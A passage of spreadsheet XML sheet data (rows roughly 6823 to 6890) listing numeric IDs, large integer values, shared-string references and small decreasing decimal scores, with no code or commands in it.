      <c r="A6823" s="1">
        <v>21364.0</v>
      </c>
      <c r="B6823" s="2">
        <v>2.1459466E7</v>
      </c>
      <c r="C6823" s="2" t="s">
        <v>6479</v>
      </c>
      <c r="D6823" s="2">
        <v>1.0</v>
      </c>
      <c r="E6823" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6823" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="6824" ht="15.75" customHeight="1">
      <c r="A6824" s="1">
        <v>22608.0</v>
      </c>
      <c r="B6824" s="2">
        <v>3.9755199E7</v>
      </c>
      <c r="C6824" s="2" t="s">
        <v>6480</v>
      </c>
      <c r="D6824" s="2">
        <v>1.0</v>
      </c>
      <c r="E6824" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6824" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="6825" ht="15.75" customHeight="1">
      <c r="A6825" s="1">
        <v>24903.0</v>
      </c>
      <c r="B6825" s="2">
        <v>1.2310392E7</v>
      </c>
      <c r="C6825" s="2" t="s">
        <v>6481</v>
      </c>
      <c r="D6825" s="2">
        <v>1.0</v>
      </c>
      <c r="E6825" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6825" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="6826" ht="15.75" customHeight="1">
      <c r="A6826" s="1">
        <v>31354.0</v>
      </c>
      <c r="B6826" s="2">
        <v>4986090.0</v>
      </c>
      <c r="C6826" s="2" t="s">
        <v>6482</v>
      </c>
      <c r="D6826" s="2">
        <v>1.0</v>
      </c>
      <c r="E6826" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6826" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="6827" ht="15.75" customHeight="1">
      <c r="A6827" s="1">
        <v>31862.0</v>
      </c>
      <c r="B6827" s="2">
        <v>5279556.0</v>
      </c>
      <c r="C6827" s="2" t="s">
        <v>6483</v>
      </c>
      <c r="D6827" s="2">
        <v>1.0</v>
      </c>
      <c r="E6827" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6827" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="6828" ht="15.75" customHeight="1">
      <c r="A6828" s="1">
        <v>32458.0</v>
      </c>
      <c r="B6828" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C6828" s="2" t="s">
        <v>6484</v>
      </c>
      <c r="D6828" s="2">
        <v>1.0</v>
      </c>
      <c r="E6828" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6828" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="6829" ht="15.75" customHeight="1">
      <c r="A6829" s="1">
        <v>33210.0</v>
      </c>
      <c r="B6829" s="2">
        <v>7206083.0</v>
      </c>
      <c r="C6829" s="2" t="s">
        <v>6485</v>
      </c>
      <c r="D6829" s="2">
        <v>1.0</v>
      </c>
      <c r="E6829" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6829" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="6830" ht="15.75" customHeight="1">
      <c r="A6830" s="1">
        <v>653.0</v>
      </c>
      <c r="B6830" s="2">
        <v>1.9967529E7</v>
      </c>
      <c r="C6830" s="2" t="s">
        <v>6486</v>
      </c>
      <c r="D6830" s="2">
        <v>1.0</v>
      </c>
      <c r="E6830" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6830" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6831" ht="15.75" customHeight="1">
      <c r="A6831" s="1">
        <v>6845.0</v>
      </c>
      <c r="B6831" s="2">
        <v>4.9632204E7</v>
      </c>
      <c r="C6831" s="2" t="s">
        <v>6487</v>
      </c>
      <c r="D6831" s="2">
        <v>1.0</v>
      </c>
      <c r="E6831" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6831" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6832" ht="15.75" customHeight="1">
      <c r="A6832" s="1">
        <v>11956.0</v>
      </c>
      <c r="B6832" s="2">
        <v>2.5593667E7</v>
      </c>
      <c r="C6832" s="2" t="s">
        <v>6488</v>
      </c>
      <c r="D6832" s="2">
        <v>1.0</v>
      </c>
      <c r="E6832" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6832" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6833" ht="15.75" customHeight="1">
      <c r="A6833" s="1">
        <v>22755.0</v>
      </c>
      <c r="B6833" s="2">
        <v>4.457719E7</v>
      </c>
      <c r="C6833" s="2" t="s">
        <v>6489</v>
      </c>
      <c r="D6833" s="2">
        <v>1.0</v>
      </c>
      <c r="E6833" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6833" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6834" ht="15.75" customHeight="1">
      <c r="A6834" s="1">
        <v>23295.0</v>
      </c>
      <c r="B6834" s="2">
        <v>5.392931E7</v>
      </c>
      <c r="C6834" s="2" t="s">
        <v>6490</v>
      </c>
      <c r="D6834" s="2">
        <v>1.0</v>
      </c>
      <c r="E6834" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6834" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6835" ht="15.75" customHeight="1">
      <c r="A6835" s="1">
        <v>25517.0</v>
      </c>
      <c r="B6835" s="2">
        <v>1.4192391E7</v>
      </c>
      <c r="C6835" s="2" t="s">
        <v>6491</v>
      </c>
      <c r="D6835" s="2">
        <v>1.0</v>
      </c>
      <c r="E6835" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6835" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6836" ht="15.75" customHeight="1">
      <c r="A6836" s="1">
        <v>27911.0</v>
      </c>
      <c r="B6836" s="2">
        <v>2.3731247E7</v>
      </c>
      <c r="C6836" s="2" t="s">
        <v>6492</v>
      </c>
      <c r="D6836" s="2">
        <v>1.0</v>
      </c>
      <c r="E6836" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6836" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6837" ht="15.75" customHeight="1">
      <c r="A6837" s="1">
        <v>27955.0</v>
      </c>
      <c r="B6837" s="2">
        <v>2.3881234E7</v>
      </c>
      <c r="C6837" s="2" t="s">
        <v>6493</v>
      </c>
      <c r="D6837" s="2">
        <v>1.0</v>
      </c>
      <c r="E6837" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6837" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6838" ht="15.75" customHeight="1">
      <c r="A6838" s="1">
        <v>31830.0</v>
      </c>
      <c r="B6838" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C6838" s="2" t="s">
        <v>6494</v>
      </c>
      <c r="D6838" s="2">
        <v>1.0</v>
      </c>
      <c r="E6838" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6838" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="6839" ht="15.75" customHeight="1">
      <c r="A6839" s="1">
        <v>21335.0</v>
      </c>
      <c r="B6839" s="2">
        <v>2.1080403E7</v>
      </c>
      <c r="C6839" s="2" t="s">
        <v>6032</v>
      </c>
      <c r="D6839" s="2">
        <v>1.0</v>
      </c>
      <c r="E6839" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6839" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="6840" ht="15.75" customHeight="1">
      <c r="A6840" s="1">
        <v>22618.0</v>
      </c>
      <c r="B6840" s="2">
        <v>4.0038827E7</v>
      </c>
      <c r="C6840" s="2" t="s">
        <v>6495</v>
      </c>
      <c r="D6840" s="2">
        <v>1.0</v>
      </c>
      <c r="E6840" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6840" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="6841" ht="15.75" customHeight="1">
      <c r="A6841" s="1">
        <v>25066.0</v>
      </c>
      <c r="B6841" s="2">
        <v>1.2874085E7</v>
      </c>
      <c r="C6841" s="2" t="s">
        <v>6496</v>
      </c>
      <c r="D6841" s="2">
        <v>1.0</v>
      </c>
      <c r="E6841" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6841" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="6842" ht="15.75" customHeight="1">
      <c r="A6842" s="1">
        <v>28781.0</v>
      </c>
      <c r="B6842" s="2">
        <v>2.844023E7</v>
      </c>
      <c r="C6842" s="2" t="s">
        <v>6497</v>
      </c>
      <c r="D6842" s="2">
        <v>1.0</v>
      </c>
      <c r="E6842" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6842" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="6843" ht="15.75" customHeight="1">
      <c r="A6843" s="1">
        <v>29074.0</v>
      </c>
      <c r="B6843" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C6843" s="2" t="s">
        <v>6498</v>
      </c>
      <c r="D6843" s="2">
        <v>1.0</v>
      </c>
      <c r="E6843" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6843" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="6844" ht="15.75" customHeight="1">
      <c r="A6844" s="1">
        <v>30412.0</v>
      </c>
      <c r="B6844" s="2">
        <v>3.8773546E7</v>
      </c>
      <c r="C6844" s="2" t="s">
        <v>6499</v>
      </c>
      <c r="D6844" s="2">
        <v>1.0</v>
      </c>
      <c r="E6844" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6844" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="6845" ht="15.75" customHeight="1">
      <c r="A6845" s="1">
        <v>30531.0</v>
      </c>
      <c r="B6845" s="2">
        <v>4.0419635E7</v>
      </c>
      <c r="C6845" s="2" t="s">
        <v>6500</v>
      </c>
      <c r="D6845" s="2">
        <v>1.0</v>
      </c>
      <c r="E6845" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6845" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="6846" ht="15.75" customHeight="1">
      <c r="A6846" s="1">
        <v>7835.0</v>
      </c>
      <c r="B6846" s="2">
        <v>5.2322113E7</v>
      </c>
      <c r="C6846" s="2" t="s">
        <v>6501</v>
      </c>
      <c r="D6846" s="2">
        <v>1.0</v>
      </c>
      <c r="E6846" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6846" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="6847" ht="15.75" customHeight="1">
      <c r="A6847" s="1">
        <v>9915.0</v>
      </c>
      <c r="B6847" s="2">
        <v>5.6801868E7</v>
      </c>
      <c r="C6847" s="2" t="s">
        <v>6502</v>
      </c>
      <c r="D6847" s="2">
        <v>1.0</v>
      </c>
      <c r="E6847" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6847" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="6848" ht="15.75" customHeight="1">
      <c r="A6848" s="1">
        <v>13021.0</v>
      </c>
      <c r="B6848" s="2">
        <v>3.2937738E7</v>
      </c>
      <c r="C6848" s="2" t="s">
        <v>6503</v>
      </c>
      <c r="D6848" s="2">
        <v>1.0</v>
      </c>
      <c r="E6848" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6848" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="6849" ht="15.75" customHeight="1">
      <c r="A6849" s="1">
        <v>20977.0</v>
      </c>
      <c r="B6849" s="2">
        <v>1.6888962E7</v>
      </c>
      <c r="C6849" s="2" t="s">
        <v>6504</v>
      </c>
      <c r="D6849" s="2">
        <v>1.0</v>
      </c>
      <c r="E6849" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6849" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="6850" ht="15.75" customHeight="1">
      <c r="A6850" s="1">
        <v>21958.0</v>
      </c>
      <c r="B6850" s="2">
        <v>2.901245E7</v>
      </c>
      <c r="C6850" s="2" t="s">
        <v>6505</v>
      </c>
      <c r="D6850" s="2">
        <v>1.0</v>
      </c>
      <c r="E6850" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6850" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="6851" ht="15.75" customHeight="1">
      <c r="A6851" s="1">
        <v>25628.0</v>
      </c>
      <c r="B6851" s="2">
        <v>1.4460434E7</v>
      </c>
      <c r="C6851" s="2" t="s">
        <v>6506</v>
      </c>
      <c r="D6851" s="2">
        <v>1.0</v>
      </c>
      <c r="E6851" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6851" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="6852" ht="15.75" customHeight="1">
      <c r="A6852" s="1">
        <v>28170.0</v>
      </c>
      <c r="B6852" s="2">
        <v>2.4950035E7</v>
      </c>
      <c r="C6852" s="2" t="s">
        <v>6507</v>
      </c>
      <c r="D6852" s="2">
        <v>1.0</v>
      </c>
      <c r="E6852" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6852" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="6853" ht="15.75" customHeight="1">
      <c r="A6853" s="1">
        <v>31400.0</v>
      </c>
      <c r="B6853" s="2">
        <v>4.9992928E7</v>
      </c>
      <c r="C6853" s="2" t="s">
        <v>6508</v>
      </c>
      <c r="D6853" s="2">
        <v>1.0</v>
      </c>
      <c r="E6853" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6853" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="6854" ht="15.75" customHeight="1">
      <c r="A6854" s="1">
        <v>10513.0</v>
      </c>
      <c r="B6854" s="2">
        <v>1.1743489E7</v>
      </c>
      <c r="C6854" s="2" t="s">
        <v>6509</v>
      </c>
      <c r="D6854" s="2">
        <v>1.0</v>
      </c>
      <c r="E6854" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6854" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="6855" ht="15.75" customHeight="1">
      <c r="A6855" s="1">
        <v>20786.0</v>
      </c>
      <c r="B6855" s="2">
        <v>1.5091859E7</v>
      </c>
      <c r="C6855" s="2" t="s">
        <v>6510</v>
      </c>
      <c r="D6855" s="2">
        <v>1.0</v>
      </c>
      <c r="E6855" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6855" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="6856" ht="15.75" customHeight="1">
      <c r="A6856" s="1">
        <v>28789.0</v>
      </c>
      <c r="B6856" s="2">
        <v>2.8528827E7</v>
      </c>
      <c r="C6856" s="2" t="s">
        <v>6360</v>
      </c>
      <c r="D6856" s="2">
        <v>1.0</v>
      </c>
      <c r="E6856" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6856" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="6857" ht="15.75" customHeight="1">
      <c r="A6857" s="1">
        <v>33205.0</v>
      </c>
      <c r="B6857" s="2">
        <v>7185770.0</v>
      </c>
      <c r="C6857" s="2" t="s">
        <v>6511</v>
      </c>
      <c r="D6857" s="2">
        <v>1.0</v>
      </c>
      <c r="E6857" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6857" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="6858" ht="15.75" customHeight="1">
      <c r="A6858" s="1">
        <v>9385.0</v>
      </c>
      <c r="B6858" s="2">
        <v>5.5743263E7</v>
      </c>
      <c r="C6858" s="2" t="s">
        <v>6512</v>
      </c>
      <c r="D6858" s="2">
        <v>1.0</v>
      </c>
      <c r="E6858" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6858" s="2">
        <v>0.1120218579234973</v>
      </c>
    </row>
    <row r="6859" ht="15.75" customHeight="1">
      <c r="A6859" s="1">
        <v>18647.0</v>
      </c>
      <c r="B6859" s="2">
        <v>5.3435143E7</v>
      </c>
      <c r="C6859" s="2" t="s">
        <v>6513</v>
      </c>
      <c r="D6859" s="2">
        <v>1.0</v>
      </c>
      <c r="E6859" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6859" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="6860" ht="15.75" customHeight="1">
      <c r="A6860" s="1">
        <v>32748.0</v>
      </c>
      <c r="B6860" s="2">
        <v>6049014.0</v>
      </c>
      <c r="C6860" s="2" t="s">
        <v>6514</v>
      </c>
      <c r="D6860" s="2">
        <v>1.0</v>
      </c>
      <c r="E6860" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6860" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="6861" ht="15.75" customHeight="1">
      <c r="A6861" s="1">
        <v>31541.0</v>
      </c>
      <c r="B6861" s="2">
        <v>5.0979185E7</v>
      </c>
      <c r="C6861" s="2" t="s">
        <v>6515</v>
      </c>
      <c r="D6861" s="2">
        <v>1.0</v>
      </c>
      <c r="E6861" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6861" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="6862" ht="15.75" customHeight="1">
      <c r="A6862" s="1">
        <v>20861.0</v>
      </c>
      <c r="B6862" s="2">
        <v>1.584464E7</v>
      </c>
      <c r="C6862" s="2" t="s">
        <v>6516</v>
      </c>
      <c r="D6862" s="2">
        <v>1.0</v>
      </c>
      <c r="E6862" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6862" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="6863" ht="15.75" customHeight="1">
      <c r="A6863" s="1">
        <v>25292.0</v>
      </c>
      <c r="B6863" s="2">
        <v>1.3405258E7</v>
      </c>
      <c r="C6863" s="2" t="s">
        <v>6517</v>
      </c>
      <c r="D6863" s="2">
        <v>1.0</v>
      </c>
      <c r="E6863" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6863" s="2">
        <v>0.111965811965812</v>
      </c>
    </row>
    <row r="6864" ht="15.75" customHeight="1">
      <c r="A6864" s="1">
        <v>32407.0</v>
      </c>
      <c r="B6864" s="2">
        <v>5.6327242E7</v>
      </c>
      <c r="C6864" s="2" t="s">
        <v>6518</v>
      </c>
      <c r="D6864" s="2">
        <v>1.0</v>
      </c>
      <c r="E6864" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6864" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="6865" ht="15.75" customHeight="1">
      <c r="A6865" s="1">
        <v>29104.0</v>
      </c>
      <c r="B6865" s="2">
        <v>3.0431969E7</v>
      </c>
      <c r="C6865" s="2" t="s">
        <v>6519</v>
      </c>
      <c r="D6865" s="2">
        <v>1.0</v>
      </c>
      <c r="E6865" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6865" s="2">
        <v>0.1102292768959436</v>
      </c>
    </row>
    <row r="6866" ht="15.75" customHeight="1">
      <c r="A6866" s="1">
        <v>33786.0</v>
      </c>
      <c r="B6866" s="2">
        <v>8750416.0</v>
      </c>
      <c r="C6866" s="2" t="s">
        <v>6520</v>
      </c>
      <c r="D6866" s="2">
        <v>1.0</v>
      </c>
      <c r="E6866" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6866" s="2">
        <v>0.1102292768959436</v>
      </c>
    </row>
    <row r="6867" ht="15.75" customHeight="1">
      <c r="A6867" s="1">
        <v>22522.0</v>
      </c>
      <c r="B6867" s="2">
        <v>3.7662385E7</v>
      </c>
      <c r="C6867" s="2" t="s">
        <v>6521</v>
      </c>
      <c r="D6867" s="2">
        <v>1.0</v>
      </c>
      <c r="E6867" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6867" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="6868" ht="15.75" customHeight="1">
      <c r="A6868" s="1">
        <v>26618.0</v>
      </c>
      <c r="B6868" s="2">
        <v>1.8024824E7</v>
      </c>
      <c r="C6868" s="2" t="s">
        <v>6522</v>
      </c>
      <c r="D6868" s="2">
        <v>1.0</v>
      </c>
      <c r="E6868" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6868" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="6869" ht="15.75" customHeight="1">
      <c r="A6869" s="1">
        <v>26819.0</v>
      </c>
      <c r="B6869" s="2">
        <v>1.877997E7</v>
      </c>
      <c r="C6869" s="2" t="s">
        <v>6523</v>
      </c>
      <c r="D6869" s="2">
        <v>1.0</v>
      </c>
      <c r="E6869" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6869" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="6870" ht="15.75" customHeight="1">
      <c r="A6870" s="1">
        <v>19874.0</v>
      </c>
      <c r="B6870" s="2">
        <v>5.7249885E7</v>
      </c>
      <c r="C6870" s="2" t="s">
        <v>6524</v>
      </c>
      <c r="D6870" s="2">
        <v>1.0</v>
      </c>
      <c r="E6870" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6870" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="6871" ht="15.75" customHeight="1">
      <c r="A6871" s="1">
        <v>26426.0</v>
      </c>
      <c r="B6871" s="2">
        <v>1.7155444E7</v>
      </c>
      <c r="C6871" s="2" t="s">
        <v>6525</v>
      </c>
      <c r="D6871" s="2">
        <v>1.0</v>
      </c>
      <c r="E6871" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6871" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="6872" ht="15.75" customHeight="1">
      <c r="A6872" s="1">
        <v>28944.0</v>
      </c>
      <c r="B6872" s="2">
        <v>2.969101E7</v>
      </c>
      <c r="C6872" s="2" t="s">
        <v>6526</v>
      </c>
      <c r="D6872" s="2">
        <v>1.0</v>
      </c>
      <c r="E6872" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6872" s="2">
        <v>0.1101532567049809</v>
      </c>
    </row>
    <row r="6873" ht="15.75" customHeight="1">
      <c r="A6873" s="1">
        <v>18696.0</v>
      </c>
      <c r="B6873" s="2">
        <v>5.3603079E7</v>
      </c>
      <c r="C6873" s="2" t="s">
        <v>6527</v>
      </c>
      <c r="D6873" s="2">
        <v>1.0</v>
      </c>
      <c r="E6873" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6873" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="6874" ht="15.75" customHeight="1">
      <c r="A6874" s="1">
        <v>20949.0</v>
      </c>
      <c r="B6874" s="2">
        <v>1.6615353E7</v>
      </c>
      <c r="C6874" s="2" t="s">
        <v>6528</v>
      </c>
      <c r="D6874" s="2">
        <v>1.0</v>
      </c>
      <c r="E6874" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6874" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="6875" ht="15.75" customHeight="1">
      <c r="A6875" s="1">
        <v>22287.0</v>
      </c>
      <c r="B6875" s="2">
        <v>3.3454888E7</v>
      </c>
      <c r="C6875" s="2" t="s">
        <v>6529</v>
      </c>
      <c r="D6875" s="2">
        <v>1.0</v>
      </c>
      <c r="E6875" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6875" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="6876" ht="15.75" customHeight="1">
      <c r="A6876" s="1">
        <v>31375.0</v>
      </c>
      <c r="B6876" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C6876" s="2" t="s">
        <v>6530</v>
      </c>
      <c r="D6876" s="2">
        <v>1.0</v>
      </c>
      <c r="E6876" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6876" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="6877" ht="15.75" customHeight="1">
      <c r="A6877" s="1">
        <v>16061.0</v>
      </c>
      <c r="B6877" s="2">
        <v>4.5289914E7</v>
      </c>
      <c r="C6877" s="2" t="s">
        <v>6531</v>
      </c>
      <c r="D6877" s="2">
        <v>1.0</v>
      </c>
      <c r="E6877" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6877" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="6878" ht="15.75" customHeight="1">
      <c r="A6878" s="1">
        <v>19892.0</v>
      </c>
      <c r="B6878" s="2">
        <v>5.7286928E7</v>
      </c>
      <c r="C6878" s="2" t="s">
        <v>6532</v>
      </c>
      <c r="D6878" s="2">
        <v>1.0</v>
      </c>
      <c r="E6878" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6878" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="6879" ht="15.75" customHeight="1">
      <c r="A6879" s="1">
        <v>21025.0</v>
      </c>
      <c r="B6879" s="2">
        <v>1.7442245E7</v>
      </c>
      <c r="C6879" s="2" t="s">
        <v>6533</v>
      </c>
      <c r="D6879" s="2">
        <v>1.0</v>
      </c>
      <c r="E6879" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6879" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="6880" ht="15.75" customHeight="1">
      <c r="A6880" s="1">
        <v>23506.0</v>
      </c>
      <c r="B6880" s="2">
        <v>5802569.0</v>
      </c>
      <c r="C6880" s="2" t="s">
        <v>6218</v>
      </c>
      <c r="D6880" s="2">
        <v>1.0</v>
      </c>
      <c r="E6880" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6880" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="6881" ht="15.75" customHeight="1">
      <c r="A6881" s="1">
        <v>28455.0</v>
      </c>
      <c r="B6881" s="2">
        <v>2.6604342E7</v>
      </c>
      <c r="C6881" s="2" t="s">
        <v>6534</v>
      </c>
      <c r="D6881" s="2">
        <v>1.0</v>
      </c>
      <c r="E6881" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6881" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="6882" ht="15.75" customHeight="1">
      <c r="A6882" s="1">
        <v>29623.0</v>
      </c>
      <c r="B6882" s="2">
        <v>3.3669091E7</v>
      </c>
      <c r="C6882" s="2" t="s">
        <v>6535</v>
      </c>
      <c r="D6882" s="2">
        <v>1.0</v>
      </c>
      <c r="E6882" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6882" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="6883" ht="15.75" customHeight="1">
      <c r="A6883" s="1">
        <v>33222.0</v>
      </c>
      <c r="B6883" s="2">
        <v>7259012.0</v>
      </c>
      <c r="C6883" s="2" t="s">
        <v>6536</v>
      </c>
      <c r="D6883" s="2">
        <v>1.0</v>
      </c>
      <c r="E6883" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6883" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="6884" ht="15.75" customHeight="1">
      <c r="A6884" s="1">
        <v>5000.0</v>
      </c>
      <c r="B6884" s="2">
        <v>4.4177805E7</v>
      </c>
      <c r="C6884" s="2" t="s">
        <v>6537</v>
      </c>
      <c r="D6884" s="2">
        <v>1.0</v>
      </c>
      <c r="E6884" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6884" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6885" ht="15.75" customHeight="1">
      <c r="A6885" s="1">
        <v>5274.0</v>
      </c>
      <c r="B6885" s="2">
        <v>4.5156087E7</v>
      </c>
      <c r="C6885" s="2" t="s">
        <v>6538</v>
      </c>
      <c r="D6885" s="2">
        <v>1.0</v>
      </c>
      <c r="E6885" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6885" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6886" ht="15.75" customHeight="1">
      <c r="A6886" s="1">
        <v>6364.0</v>
      </c>
      <c r="B6886" s="2">
        <v>4.8373705E7</v>
      </c>
      <c r="C6886" s="2" t="s">
        <v>6539</v>
      </c>
      <c r="D6886" s="2">
        <v>1.0</v>
      </c>
      <c r="E6886" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6886" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6887" ht="15.75" customHeight="1">
      <c r="A6887" s="1">
        <v>8923.0</v>
      </c>
      <c r="B6887" s="2">
        <v>5.4827686E7</v>
      </c>
      <c r="C6887" s="2" t="s">
        <v>6540</v>
      </c>
      <c r="D6887" s="2">
        <v>1.0</v>
      </c>
      <c r="E6887" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6887" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6888" ht="15.75" customHeight="1">
      <c r="A6888" s="1">
        <v>10836.0</v>
      </c>
      <c r="B6888" s="2">
        <v>1.5992104E7</v>
      </c>
      <c r="C6888" s="2" t="s">
        <v>6541</v>
      </c>
      <c r="D6888" s="2">
        <v>1.0</v>
      </c>
      <c r="E6888" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6888" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6889" ht="15.75" customHeight="1">
      <c r="A6889" s="1">
        <v>11556.0</v>
      </c>
      <c r="B6889" s="2">
        <v>2.2700772E7</v>
      </c>
      <c r="C6889" s="2" t="s">
        <v>6542</v>
      </c>
      <c r="D6889" s="2">
        <v>1.0</v>
      </c>
      <c r="E6889" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6889" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6890" ht="15.75" customHeight="1">
      <c r="A6890" s="1">
